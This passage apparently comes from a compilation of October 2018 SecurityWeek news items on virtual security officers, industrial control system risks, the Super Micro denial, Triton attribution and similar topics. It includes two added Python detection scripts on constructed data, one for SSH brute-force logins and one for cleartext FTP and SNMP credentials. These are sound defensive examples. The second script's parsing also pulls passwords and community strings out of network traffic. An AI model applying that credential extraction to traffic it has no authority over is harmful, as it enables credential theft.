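Sophos's advice above is to change default passwords because the bot cycles through publicly known credential pairs over SSH. The following detection script is an added example written for this article, not code from Sophos or from the Chalubo analysis: it parses constructed sshd log lines (the host name, addresses, timestamps and the assumed log year 2018 are all made up) and flags a source that racks up several failed password attempts within a short window, noting whether a later login from the same source succeeded, which is exactly the trace a default-credential scanner leaves in /var/log/auth.log.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample sshd log lines (not real data). One source cycles through
# default credential pairs and finally gets in as root; a second host has a
# single failed attempt that should not be flagged.
SAMPLE_AUTH_LOG = """\
Sep  3 10:12:01 edge-gw sshd[2311]: Failed password for root from 203.0.113.7 port 51002 ssh2
Sep  3 10:12:02 edge-gw sshd[2311]: Failed password for root from 203.0.113.7 port 51002 ssh2
Sep  3 10:12:04 edge-gw sshd[2314]: Failed password for invalid user admin from 203.0.113.7 port 51010 ssh2
Sep  3 10:12:05 edge-gw sshd[2316]: Failed password for root from 203.0.113.7 port 51014 ssh2
Sep  3 10:12:07 edge-gw sshd[2318]: Failed password for invalid user pi from 203.0.113.7 port 51020 ssh2
Sep  3 10:12:09 edge-gw sshd[2320]: Accepted password for root from 203.0.113.7 port 51024 ssh2
Sep  3 10:15:30 edge-gw sshd[2400]: Accepted publickey for ops from 198.51.100.5 port 40022 ssh2
Sep  3 10:16:00 edge-gw sshd[2402]: Failed password for ops from 198.51.100.5 port 40030 ssh2
"""

# Syslog lines carry no year; the log year is assumed to be 2018 here.
ASSUMED_YEAR = "2018"

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_sshd_log(text):
    """Turn sshd auth lines into event dicts; lines that are not auth results are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())          # collapse the day-padding spaces
        ts = datetime.strptime(f"{ASSUMED_YEAR} {stamp}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect_ssh_bruteforce(events, threshold=3, window_seconds=60):
    """Flag a source IP once it accumulates `threshold` failed password attempts
    inside a sliding window of `window_seconds`; keep the set of usernames tried
    and record whether a later login from that IP was accepted."""
    recent = defaultdict(deque)        # ip -> failure timestamps still inside the window
    total_failures = defaultdict(int)
    users_tried = defaultdict(set)
    alerts = {}                        # ip -> alert dict, in order of first detection
    for ev in events:
        ip = ev["ip"]
        if ev["result"] == "Failed":
            total_failures[ip] += 1
            users_tried[ip].add(ev["user"])
            q = recent[ip]
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()            # drop failures that fell out of the window
            if len(q) >= threshold:
                alert = alerts.setdefault(
                    ip, {"ip": ip, "success_after": False, "success_user": None})
                alert["failures"] = total_failures[ip]
                alert["users"] = sorted(users_tried[ip])
        elif ip in alerts:
            # An accepted login from an already-flagged source: the guessing worked.
            alerts[ip]["success_after"] = True
            alerts[ip]["success_user"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(parse_sshd_log(SAMPLE_AUTH_LOG)):
        status = f"then logged in as {alert['success_user']}" if alert["success_after"] else "no success seen"
        print(f"{alert['ip']}: {alert['failures']} failures, users {alert['users']}, {status}")
```

On the constructed sample this reports 203.0.113.7 with five failures across root, admin and pi followed by a successful root password login, and stays quiet about 198.51.100.5. The "success after burst" flag is the part worth alerting on: a burst of failures alone is background noise on any Internet-facing SSH port, while a success that follows one usually means a default or weak password is in use on that device.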

The Rise of The Virtual Security Officer
24.10.2018 securityweek

The market for virtual security officers is growing. We’ve had virtual chief information security officers for a few years (vCISOs), and we can expect to see virtual data protection officers (vDPOs) in the next few. The demand for both is higher than it has ever been, and it is likely to grow.

This article will examine the rise of virtual security officers, the role of virtual security officers, and navigating the choice of a virtual officer.

The rise of the virtual security officer

It is increasingly important for organizations to have and be seen to have a CISO. The difficulty in keeping data safe from sophisticated cyber criminals and well-resourced and persistent nation state actors is compounded by a likely increase in regulatory demands that organizations have a named CISO or head of cybersecurity.

The latter is already happening. The New York State Department of Financial Services regulation 23 NYCRR Section 500 states, “Each Covered Entity shall designate a qualified individual responsible for overseeing and implementing the Covered Entity’s cybersecurity program and enforcing its cybersecurity policy (for purposes of this Part, ‘Chief Information Security Officer’ or ‘CISO’).” It then adds that this CISO need not be directly employed, but could, in fact, be a virtual CISO.

GDPR, Article 37, states, “The controller and the processor shall designate a data protection officer…” This requirement for a DPO applies to public bodies (apart from courts) and any organization where data subject processing or monitoring occurs ‘on a large scale’. Paragraph 2 adds, “A group of undertakings may appoint a single data protection officer provided that a data protection officer is easily accessible from each establishment;” again paving the way for virtual DPOs.

It then becomes a supply-and-demand problem – there simply aren’t enough good experienced CISOs and DPOs to go around. Those that exist are attracted to big prestigious companies that can afford to pay high salaries. A leading CISO told SecurityWeek he had applied for a different position because of ‘the insane amount of money being offered’. He was one of 200 qualified applicants for the position; and the whole process is indicative of the migration of good qualified CISOs from small and medium organizations to large and prestigious organizations.

This leaves smaller firms struggling to find security officers that are required by law and cybersecurity conditions. Virtual officers would appear to be the obvious solution.

“Virtual CISOs are certainly on the rise,” Rick Moy, CMO at Acalvio told SecurityWeek. “Like previous trends where mid-sized organizations lacked financial and legal talent, they turned to retainer-based professionals with specialized expertise. In many ways virtual security officers are similar to virtual CFOs and attorneys.”


The CISO role is not an easy one. Scott King, senior director with Rapid7’s security advisory services, explains, “They must be adoptive of a mindset where they anticipate how, and where, bad things will happen, understand how the technology can be abused by adversaries, while at the same time being able to communicate all of that in terms of risk and potential financial exposure to the C-suite and the Board.”

He adds, they “must be able to demonstrate the typical soft skills any leader needs to have… The hard part though, is learning how to talk to people about security in a way that resonates and doesn't alienate or create tenacious relationships. In other words, the supply of people with those skills is short, and the need for those people outpaces the supply.”


The two key requisites for a DPO are the ability to act independently of the security team, and to have a deep understanding of data protection regulations. The latter is no easy task. Apart from GDPR and other national laws around the globe, each state in the U.S. has its own separate data protection regulation.

The DPO is defined in Recital 97 of the GDPR as “a person with expert knowledge of data protection law and practices [who] should assist the controller or processor [primarily the CISO] to monitor internal compliance with this Regulation.” It adds that the DPO should be able to act in an independent manner.

The implication is that under GDPR the DPO role must not be undertaken by the CISO, while under other regulations it almost certainly should not be. It is a position that sits between Legal, Security and IT that demands an understanding of each. However, it is hard to see how for any organization other than the very largest, the required DPO needs to be a full-time position.

The role of the virtual security officer

Virtual security officers may be the solution for smaller companies that cannot find a qualified CISO within their price range, or have just lost a CISO and are struggling to re-fill the position; and for companies that are required to have a named DPO but do not wish or cannot afford a full-time specialist.

The vDPO is a new and emerging role. It is a service offered by numerous agencies, but there are as yet few seasoned vDPOs. This is not the case with vCISOs. Candy Alexander, the ISSA international president, has been an accidental vCISO for the last four years. She had been a CISO with a federal contractor and was moving to a new position which fell through at the last minute.

She moved into consulting just as the concept of vCISO began to grow. “Considering many smaller businesses haven’t invested in security at any level,” she told SecurityWeek, “there is a need for a security strategist – someone that understands business and security – but is not necessarily affordable to bring on as an FTE. With the use of a vCISO, a company can pay by hour (retainer based) or by project, and get the expertise of a highly qualified, experienced CISO without the overhead of benefits and total compensation.”

The vCISO, she continued, is “able to work with multiple clients at a time to equal a full-time salary, with the flexibility of work hours and not having to deal with the internal struggles that usually come with the job.”

This last point is echoed by Bill Bonney, another experienced vCISO and co-author of the CISO Desk Reference Guide. “CISOs are burned out and pissed off at the years of torture they received at the hands of their peers and their bosses,” he said. “More and more of them are deciding that they are not going to continue to absorb the stress and risk of moving, commuting, and being the ‘one throat to choke’.”

Bonney’s work falls into three categories. “I work for one firm that uses me purely in a ‘parachute in’ model – I go in, I help out with a single or specific set of projects, and I get out. I also have my own gigs where I help at a strategic level and turn over long-term operations when I have them at the right stage; and still another model where I act as a resource for consultation.” These models allow him to provide vCISO services to multiple clients simultaneously.

Bonney echoes Alexander’s comment that the vCISO is a security strategist, not a tactician. “What makes for a good virtual CISO as opposed to a perm hire is the ability to remain strategic when you are supposed to be strategic. There are so many tactical needs it is easy to fall into the trap of becoming tactical. But, unless the contract calls for operational support, stay strategic. The other critical success factor is breadth and your personal network. What we call the ‘human network’. Consult with your peers. That makes for a better CISO, but it is critical for a vCISO.”

One difference between the role of the virtual officer and the full-time CISO is that there is less need to understand the business side of the organization. “Although important,” comments Stewart Twynham, a security and privacy evangelist, “for a vCISO it is less about understanding the clients’ business and more about the security, compliance and regulatory frameworks in which the client needs to be operating.”

Rapid7’s Scott King tends to agree, but for a slightly different reason. “Most businesses are run in essentially the same manner. Every business leader will think that their business is unique and different; however, that is not the case. There'll be unique aspects of one company over another, but business is business, and cyber plays a very similar role regardless of industry or market segment. The role just scales or expands into larger companies and/or specific industries (like healthcare, energy, etc.)”

But it’s a little different for the vDPO. “A vDPO would be a little different here,” says Twynham, “because the regulatory environment will tend to be a stronger influence in their decision making – so this is where you may well be looking for a background within that particular industry sector – especially in areas such as health, finance or education.”

King thinks it is more important to be able to understand – and accommodate – different corporate cultures. “That is the area where almost every security leader who has failed in their role has struggled,” he told SecurityWeek. “Either the company has adopted a culture where security and risk management are important, or they have not yet gotten there. The successful cyber leader must be able work in both cultures.”

And the virtual officer needs to be able to switch between the two seamlessly, from one client to another.

Navigating the choice of a virtual security officer

Virtual security officers are a good solution in some situations; but are not always the best route for all organizations. If a named CISO and/or DPO is required by law, there are several aspects to consider in deciding between full-time recruitment or a virtual solution.


“Virtual CISOs are a great solution for small and medium businesses that need hands-on expertise and guidance, but would struggle to source, hire and support a traditional CISO,” explains Timur Kovalev, CTO at Untangle. “Smaller organizations already trust channel partners like VARs, MSPs and MSSPs to help them build out their IT solutions. Virtual CISOs are a natural extension to that expertise, bringing together solution architecture and technology services with strategic leadership around policies, compliance and reporting.”

But excessive use of a virtual officer would rapidly reverse the financial equation. “I would never recommend to any customer that they leverage a vCISO on a permanent basis. The cost is prohibitively high and if a company has a need (compliance or other) for a named person in that role, they should just hire for it,” comments King.

The key is in recognizing at what point the use of a virtual officer tips over from being cost-effective to cost-excessive.


The majority of applicants for a full-time CISO role have little or no practical experience of the position. This problem is compounded by the employer often having little or no understanding of what is required – the reason that many companies need a CISO is simply because they haven’t got one.

“Most businesses that need a CISO,” explains Twynham, “don’t actually realize they do. For those businesses that do realize – the difficulty for them is then knowing what they are looking for… which is why some CISO job ads list skills, certifications or frameworks which are just not relevant. Finally – businesses also struggle to understand what a CISO is actually for – which can result in an unproductive engagement.”

However, if a company looks at existing, practicing vCISOs, they will almost certainly – by definition – have the experience of working with and learning from multiple security infrastructures. “The big advantage of operating like this,” adds Twynham, “is that you’re getting the greatest value add out of your vCISO in the minimum time – the 80/20 rule.”

It’s an issue related to ‘cost’. If a company needs a CISO and cannot afford to poach experience from another company, then the virtual route may be the solution. The vCISO could even have a side task to train an existing member of the security team into the role for the long-term.

Immediacy of response

Article 37 of the GDPR allows for vDPOs, “provided that a data protection officer is easily accessible from each establishment.” While access to the vDPO is required, access to the vCISO is self-evidently a necessity. “A vCISO,” says Twynham, “has to be prepared to handle a crisis situation at any time, which obviously cannot be pre-scheduled. Inevitably, if he or she is on the other side of the country, that may necessitate operating remotely which is not always ideal for either party.”

If that crisis involves fire-fighting a malware outbreak with one client, it would be impossible for the same vCISO to tackle active intruders with another. While some of the requirements could be handled remotely, many companies would wish for their primary expert to be available on-site under such circumstances.

The solution to this problem may be to insist on a service level agreement (SLA) with the virtual officer. Most do not work entirely on their own, but may belong to a company offering the service or have at least a working relationship with other virtual officers. Immediacy of response should be the virtual officer’s problem to solve, not the contracting company’s.


While contracting employers might worry about the level of loyalty a virtual officer might have towards the company, this is probably a non-issue. A virtual officer’s future career will depend upon the quality of testimonials from existing and past clients, and is likely to defend that with as much vigor as any permanent employee.

Where loyalty may be an issue, however, is if the virtual officer is a permanent employee of a third-party company such as an MSP or MSSP. Loyalty to that employer could lead to product pressure.

“Of course an MSSP could fill the role of vCISO,” comments Candy Alexander, “but I would be very careful here. I have seen many of these ‘upselling’ either products or services. I would recommend that if anyone is looking to contract a vCISO, then they ensure that the firm is not a reseller of product, and limit the contract to just vCISO services – with any other consulting services coming from another firm. This would avoid any hidden agendas of getting additional revenue.”

Finding independent virtual officers may become more difficult in future years. More and more consultancies and service providers are likely to add ‘virtual security officers for hire’ over the next few years. “This could be a growth area for traditional MSPs or MSSPs,” says Kovalev, “as well as IT consultants, who want to expand their service portfolio with professional services alongside technology services.”

One position or two?

The final consideration is whether one virtual security officer could be employed as both a vCISO and a vDPO. If the positions were permanent, they would need to be kept separate to conform to GDPR. This specifies that the vDPO must be able to act independently – and the potential for conflict of interest between security and compliance is high where career positions are concerned.

This may not be so with a virtual security officer. “It’s possible that a vCISO could also act as a vDPO,” comments Dana Simberkoff, chief risk, privacy and information security officer at AvePoint. In practice it might be easier for a single virtual officer to find the best route between competing demands than two separate officers with separate priorities. Simberkoff’s primary concern is whether a single officer can have the range of knowledge required for both roles.

Plaintext Passwords Often Put Industrial Systems at Risk: Report
24.10.2018 securityweek

ATLANTA — SECURITYWEEK 2018 ICS CYBER SECURITY CONFERENCE — Plaintext passwords crossing the network, outdated operating systems, direct connections to the Internet, and the lack of automated updates for security solutions often put industrial systems at risk of attacks, according to a new report published on Tuesday by industrial cybersecurity firm CyberX.

The "Global ICS & IIoT Risk Report" is based on the analysis of more than 850 production industrial networks around the world between September 2017 and September 2018.

The analysis showed that 69 percent of industrial sites had their networks traversed by plaintext passwords. The problem is often related to the use of legacy protocols, such as SNMP and FTP, which can expose sensitive credentials and make it easier for malicious actors to conduct reconnaissance and hack systems, CyberX warned.
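The report's "plaintext passwords crossing the network" finding comes down to two protocols named above: FTP sends USER and PASS as readable text, and SNMPv1/v2c carries its community string (effectively the password) as a plain OCTET STRING in every packet. The script below is an added example written for this article, not CyberX's tooling or part of its report: it scans constructed sample flows (addresses, payloads and the device names are all made up) with a small BER reader for the SNMP message header and a line parser for the FTP control channel, and reports each flow that exposes a credential, masking the FTP password rather than echoing it.

```python
import re

# Constructed SNMPv2c GetRequest (not a real capture). BER layout:
SNMP_V2C_GET = bytes.fromhex(
    "30 18"                      # SEQUENCE, 24 bytes of content
    "02 01 01"                   #   INTEGER version = 1 (SNMPv2c)
    "04 06 70 75 62 6c 69 63"    #   OCTET STRING community = "public"
    "a0 0b"                      #   GetRequest-PDU, 11 bytes
    "02 01 01"                   #     request-id
    "02 01 00"                   #     error-status
    "02 01 00"                   #     error-index
    "30 00"                      #     empty variable-bindings
)
# Constructed SNMPv3 header fragment: version 3 messages carry no community string.
SNMP_V3_GET = bytes.fromhex("30 05 02 01 03 30 00")

# Constructed client-to-server payloads; ports follow IANA assignments (21 FTP, 161 SNMP).
SAMPLE_FLOWS = [
    {"src": "10.1.5.20", "dst": "10.1.5.2", "dport": 21,
     "payload": b"USER plcadmin\r\nPASS Welcome1\r\nPWD\r\n"},
    {"src": "10.1.5.20", "dst": "10.1.5.40", "dport": 161, "payload": SNMP_V2C_GET},
    {"src": "10.1.5.21", "dst": "10.1.5.40", "dport": 161, "payload": SNMP_V3_GET},
    {"src": "10.1.5.22", "dst": "10.1.5.3", "dport": 443, "payload": b"\x16\x03\x01\x00\x2a"},
]


def _ber_tlv(buf, pos):
    """Read one BER tag-length-value at buf[pos]; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def snmp_community(packet):
    """Return (version name, community string) for an SNMP message; community is None for v3."""
    tag, body, _ = _ber_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message: outer SEQUENCE missing")
    tag, ver, pos = _ber_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    version = int.from_bytes(ver, "big")
    if version == 3:
        return "v3", None              # v3 uses USM; no community string to expose
    tag, community, _ = _ber_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community OCTET STRING missing")
    return {0: "v1", 1: "v2c"}.get(version, f"v{version}"), community.decode("ascii", "replace")


FTP_CMD_RE = re.compile(r"^(USER|PASS) (\S+)$", re.IGNORECASE)


def ftp_credentials(payload):
    """Pull USER and PASS arguments out of an FTP control-channel payload; None if absent."""
    user = password = None
    for line in payload.decode("latin-1").splitlines():
        m = FTP_CMD_RE.match(line.strip())
        if m and m[1].upper() == "USER":
            user = m[2]
        elif m:
            password = m[2]
    return user, password


def scan_flows(flows):
    """Report every flow that carries a credential in the clear."""
    findings = []
    for f in flows:
        base = {"src": f["src"], "dst": f["dst"]}
        if f["dport"] == 21:
            user, password = ftp_credentials(f["payload"])
            if password is not None:
                findings.append({**base, "proto": "ftp", "user": user,
                                 "detail": f"FTP password for {user!r} sent in cleartext "
                                           f"({len(password)} characters, masked)"})
        elif f["dport"] in (161, 162):
            try:
                version, community = snmp_community(f["payload"])
            except (ValueError, IndexError):
                continue                # malformed or truncated; not our concern here
            if community is not None:
                findings.append({**base, "proto": "snmp", "version": version,
                                 "community": community,
                                 "detail": f"SNMP{version} community {community!r} in cleartext"})
    return findings


if __name__ == "__main__":
    for finding in scan_flows(SAMPLE_FLOWS):
        print(f"{finding['src']} -> {finding['dst']}: {finding['detail']}")
```

Run against the sample it reports the FTP login from 10.1.5.20 and the "public" community string sent to 10.1.5.40, and says nothing about the SNMPv3 or TLS flows. Feeding it real traffic means reassembling the FTP control stream and pulling UDP payloads out of a capture first; the parsing and the decision of what counts as exposure are what the example shows.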

It also found that many industrial companies don’t air-gap systems, and they actually often connect them directly to the Internet. CyberX discovered that 40 percent of industrial sites have at least one connection to the Internet.

In comparison, last year’s report from CyberX revealed that roughly one-third of industrial sites had been connected to the Internet. It’s worth noting that the 2017 report was based on the analysis of 375 OT networks.

Even more worrying is that CyberX claims to have found at least one remotely accessible device in 84 percent of the industrial networks it has analyzed.

“Remote management and access protocols like RDP, VNC, and SSH make it easier for administrators to remotely configure devices — but they also make it easier for attackers with stolen credentials to learn exactly how equipment is configured and eventually manipulate it,” the company said in its 2018 report.

CyberX clarified that this does not necessarily mean these systems are remotely accessible from the Internet. Instead, it means that malicious actors gaining access to a network could leverage the remote management and access protocols used by admins for legitimate purposes to more easily navigate through the ICS network.

The report also reveals a problem with cybersecurity software, specifically automatic updates. CyberX determined that 57 percent of industrial sites don't have automatic antivirus updates.

Phil Neray, VP of Industrial Cybersecurity at CyberX, told SecurityWeek that the company looks for the network communications typically associated with automatic antivirus signature updates on clients. If these connections are not present, it’s likely that security software is not being updated automatically, but it could also mean that there is no security software whatsoever.

“In some organizations, the updates are performed periodically via sneakernet and USB drives -- such as once per quarter or once per year -- which means that the AV software is providing very weak protections, since signatures are changing on a daily basis,” Neray explained.

He added, “For many years, the ICS automation vendors did not permit installation of any AV on their devices since the AV scanning was believed to cause latency issues that would negatively affect time-critical processes. This has now changed and most vendors have certified both AV as well as application whitelisting solutions. So the lack of AV might be a ‘hangover’ effect from the past, or it might be that many organizations haven't bothered to configure an automated update process.”

Another fairly common security issue identified by CyberX during its monitoring was the presence of wireless access points, which it found in 16 percent of industrial sites. The problem with these access points is that if they are misconfigured, they open the door to various types of threats, particularly malware designed to target networking devices, such as the recently discovered VPNFilter.

Finally, the report says obsolete operating systems, such as Windows XP, have been found in over half of the monitored industrial networks.

While many of CyberX’s recent findings are similar to the ones described in the company’s previous report, this is an area where significant improvements have been recorded. In 2017, there were legacy Windows systems in 76 percent of sites and now it has dropped to 53 percent.

The firm’s experts believe this improvement is the result of the WannaCry and NotPetya attacks, which clearly demonstrated to boards and C-level executives that vulnerabilities in their production environments could have significant consequences.

CyberX data

*Updated with clarifications from CyberX regarding remote access

Mozilla Offers VPN Service to Firefox Users
24.10.2018 securityweek

Mozilla and ProtonVPN this week announced a partnership aimed at keeping users safe while navigating the Internet.

Thus, starting October 24, Mozilla will offer the ProtonVPN service to a small group of Firefox users based in the United States. The company will select the users randomly and will offer them the possibility to purchase a monthly subscription to the virtual private network (VPN).

The VPN service is supported on Windows, macOS, Linux, iOS, and Android, and can be easily turned on or off as needed. The subscription is billed securely using payment services Stripe and Recurly and can be cancelled at any time.

Mozilla teams up with ProtonVPN

Mozilla will collect the payments from the users who decide to subscribe and will also keep most of the revenue from these subscriptions. ProtonVPN will get a portion of the proceeds to offset their costs in operating the service.

“In this way, subscribers will be directly supporting Mozilla while benefiting from one of the very best VPN services on the market today,” Mozilla notes.

According to ProtonVPN, Firefox users will receive the same benefits as those who purchase a ProtonVPN Plus subscription. They will also get a 30-day money back guarantee.

“The Mozilla and ProtonVPN partnership is an experiment in finding new ways to keep Internet users safe while simultaneously ensuring that open source and non-profit software development gets the resources that it deserves,” ProtonVPN explains in a blog post.

VPN services are meant to secure Internet connections against monitoring and eavesdropping by encrypting all Internet traffic and routing it through a secure server. Such a service prevents anyone on the network (including the Internet service provider) from seeing what websites the user is visiting and from tracing them.

When using a VPN service, however, the user puts a lot of trust in the provider, because they depend upon the safety of its technology and its commitment to protecting privacy, Mozilla notes. Thus, before selecting ProtonVPN for the partnership, Mozilla decided to vet and approve the service provider.

The Swiss-based VPN service provider reveals that Mozilla actually took its time during the vetting of ProtonVPN. Not only did they check the system’s architecture, infrastructure, and no-logging policies, but also had a look at the cryptography used to encrypt user traffic.

“We’re excited about this partnership because it furthers our shared goal of making the Internet a safer place. If the experiment goes well, then we may expand it and we can potentially offer ProtonVPN to over 300 million Mozilla users, significantly increasing security and privacy around the world,” the service provider says.

Oracle Adds New Security Services to Cloud Platform
24.10.2018 securityweek

Oracle adds new security services to Cloud Infrastructure

Oracle announced on Tuesday that it has added several new security-related services to its Cloud platform, including a web application firewall (WAF), distributed denial-of-service (DDoS) protection, key management, and a cloud access security broker (CASB).

Oracle says the goal of adding new capabilities to Oracle Cloud Infrastructure, which is the company’s enterprise Infrastructure-as-a-Service (IaaS) platform, is to provide end-to-end security for customers through multiple layers of defense.

The new WAF is designed to protect apps on the Cloud Infrastructure against various types of threats, including botnets, DDoS, and application-specific attacks. Threats are automatically blocked and security teams are notified so that they can investigate further.

In order to help ensure the availability of network resources, even when faced with a high-volume DDoS attack, all Oracle data centers will automatically benefit from DDoS detection and mitigation capabilities.

The new CASB is designed to monitor cloud environments to ensure that security practices are being followed. It also uses behavioral analytics based on machine learning to predict potential threats. Users are provided preconfigured controls and policies to help them deploy applications faster without security or operational risks, Oracle said.

Finally, the key management service provides centralized key management and monitoring capabilities, and allows organizations to encrypt data with keys they control.

“The solution delivers partitions in highly available and certified Hardware Security Modules that are isolated per customer. It is ideal for organizations that need to verify for regulatory compliance and security governance purposes that their data is encrypted where it is stored,” Oracle explained.

The software giant told SecurityWeek that the key management, DDoS and CASB capabilities are already available, while the WAF should become available in November.

The DDoS protection is provided to customers at no additional charge. Information on pricing for the key management and CASB services can be found on Oracle’s website. The company noted that the universal credits for Oracle Cloud Infrastructure can be used for these new services as well.

“Organizations are facing constant security threats from sophisticated actors who want to attack their applications and access their sensitive data,” said Don Johnson, senior vice president of product development at Oracle Cloud Infrastructure. “The new solutions build on Oracle’s existing, strong security heritage and give customers always-on capabilities that make it easier than ever to achieve end-to-end security. These new security layers include highly automated detective, preventive, responsive, and predictive security controls that help mitigate data breaches, address regulatory compliance, and reduce overall risk.”

Super Micro to Customers: Chinese Spy Chips Story Is Wrong
24.10.2018 securityweek

A Bloomberg article claiming that tiny chips were inserted in Super Micro Computer Inc. equipment “is wrong,” the California-based server manufacturer says.

The article, which Bloomberg ran in early October, claimed that Chinese spies, likely state-sponsored, were able to infiltrate production processes and include chips the size of a grain of rice on equipment used by tech giants such as Amazon and Apple.

The chips, the story claimed, would create a stealthy, hardware-based doorway into computer equipment. Attackers could then reportedly leverage these chips to compromise systems in an effort to spy on more than 30 organizations in the United States.

Super Micro has refuted the claims right from the start, saying that it never found any such malicious chips in its equipment, nor has it been informed by any customer of the discovery of such chips.

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied any investigations supposedly launched as a result of the discovery of spy chips.

Amazon said it never found evidence of malicious hardware in Super Micro equipment, while Apple told the U.S. Congress the Bloomberg story was “simply wrong.”

In a letter sent to its customers and also forwarded to the U.S. Securities and Exchange Commission, Super Micro too calls the Bloomberg story wrong. The company also notes that it does not know of, nor has it seen, any malicious hardware chips implanted during the manufacturing of its motherboards.

“We trust you appreciate the difficulty of proving that something did not happen, even though the reporters have produced no affected motherboard or any such malicious hardware chip. As we have said firmly, no one has shown us a motherboard containing any unauthorized hardware chip, we are not aware of any such unauthorized chip, and no government agency has alerted us to the existence of any unauthorized chip,” the letter reads.

The company also reveals that, despite the lack of proof, it has decided to undertake “a complicated and time-consuming review to further address the article.” Furthermore, Super Micro notes, it is testing every board, both visually and functionally, throughout the entire manufacturing process.

The letter is meant to reassure customers of the complex testing process it employs for its products, which includes “several automated optical inspections, visual inspections, and other functional inspections.” These tests, the company says, are meant to also check the integrity and composition of designs, so as to discover any discrepancies.

“Our motherboard designs are extremely complex. This complexity makes it practically impossible to insert a functional, unauthorized component onto a motherboard without it being caught by any one, or all, of the checks in our manufacturing and assembly process. The complex design of the underlying layers of the board also makes it highly unlikely that an unauthorized hardware component, or an altered board, would function properly,” the company points out.

“Our motherboard technology involves multiple layers of circuitry. It would be virtually impossible for a third party, during the manufacturing process, to install and power a hardware device that could communicate effectively with our Baseboard Management Controller because such a third party would lack complete knowledge (known as “pin-to-pin knowledge”) of the design,” Super Micro also notes.

Others too have investigated Bloomberg’s claims and note that the manner in which the article says the spy chips would be activated is technically implausible.

In an interview with BuzzFeed News, Apple CEO Tim Cook denied the allegations, and even said that Bloomberg should retract their story. Andy Jassy of Amazon Web Services (AWS) too says Bloomberg should retract.


Immediately after the original article was published, the stocks of Chinese companies Lenovo Group and ZTE Corporation took a hit. Super Micro’s stock dropped more than 40% and only recovered slightly.

Triton Malware Linked to Russian Government Research Institute
24.10.2018 securityweek
BigBrothers  Virus

The development of the malware tracked as Triton, Trisis and HatMan was supported by a research institute owned by the Russian government, FireEye reported on Tuesday.

The Triton attack, aimed at industrial control systems (ICS) at a critical infrastructure organization in the Middle East, came to light in December 2017. The malware targeted Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, including via the use of a zero-day vulnerability, and it was discovered after a process shutdown that experts believe was accidentally triggered by the hackers.

Several companies have analyzed the attack and the threat actor behind it, including industrial cybersecurity firm Dragos, which tracks the group as Xenotime, and FireEye.

FireEye now says it has uncovered a strong link between the Triton intrusion (the cybersecurity firm tracks this activity as TEMP.Veles) and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a technical research organization located in Moscow and owned by the Russian government.

FireEye has presented several pieces of evidence that show a connection between Triton and the CNIIHM, and the company claims to be in possession of even more information that reinforces the link, but which has been withheld due to its sensitive nature.

FireEye has pointed out that while there is strong evidence suggesting that the Russian institute has been involved in the development of some tools used in the Triton attack, it does not claim that the entire Triton framework is the work of this organization.

There are several aspects that have led to FireEye assessing with “high confidence” that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. One of the most important clues is related to the testing of some TEMP.Veles tools in a malware testing environment — the security firm has not named the service, but one of the most widely used is VirusTotal.

FireEye’s researchers discovered that a user who has been active in the aforementioned testing environment since 2013 has on several occasions tested various tools, including many customized versions of widely available applications such as Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

The goal was apparently to ensure that the custom versions would evade detection by security software. Researchers pointed out that many of the tools were used in TEMP.Veles attacks just days after being analyzed in the malware testing environment.

A path contained in one of the tested files led investigators to the online moniker of a Moscow-based individual who had been involved in vulnerability research and who had apparently been a professor at CNIIHM.

Furthermore, experts also discovered that one IP address registered to the Russian institute had been used in activity linked to Triton, including monitoring open source coverage of the attack, conducting reconnaissance against TEMP.Veles targets, and various other types of malicious activity in support of the Triton intrusion.

The presence of multiple files with Cyrillic names and artifacts also reinforces the link to Russia, along with behavior patterns consistent with Moscow’s time zone.

Researchers also pointed out that CNIIHM’s knowledge and personnel would make it highly capable of developing the Triton malware. It has research departments that specialize in the protection of critical infrastructure and the development of weapons and military equipment, and it collaborates with a wide range of other organizations, including ones involved in computer science, electrical engineering, defense systems, and information technologies.

It’s also possible, FireEye explained, that some employees of CNIIHM conducted these activities without the knowledge or approval of the organization. However, the company believes this scenario is less likely considering that the activity spans several years and that the institute’s capabilities are consistent with what one would expect of the entity behind the Triton campaign.

Fortinet Tackles Insider Threats with ZoneFox Acquisition
24.10.2018 securityweek

Cybersecurity solutions provider Fortinet today announced that it has completed the acquisition of insider threat detection and response company ZoneFox.

Fortinet provides large enterprises, service providers, and government organizations worldwide with intelligent, seamless protection. Earlier this year, the company, which claims more than 360,000 customers, revealed a new machine learning (ML) threat intelligence and detection offering.

The Edinburgh, Scotland-based, privately-held ZoneFox is focused on combating insider threats through reducing the risk of data theft, leakage and misuse. The company provides actionable insights around user behavior and data flow, from both on and off the corporate network.

With the new acquisition, Fortinet looks to enhance the Fortinet Security Fabric and strengthen its existing endpoint and SIEM business.

Through this deal, the company aims to provide customers with deeper visibility into endpoints and the associated data flow and user behavior, along with an easy-to-deploy, zero-configuration agent that can scale to support over 10,000 agents.

Machine learning should help process billions of events per day and discover suspicious activities, while Fortinet’s cloud-based architecture can capture essential data around user, device, resource, process, and behavior.

Furthermore, customers will benefit from full forensics timeline recording of information, while a simple search interface will help analysts quickly determine the actions needed. Out-of-the-box support for industry-wide policies and regulations is also available.

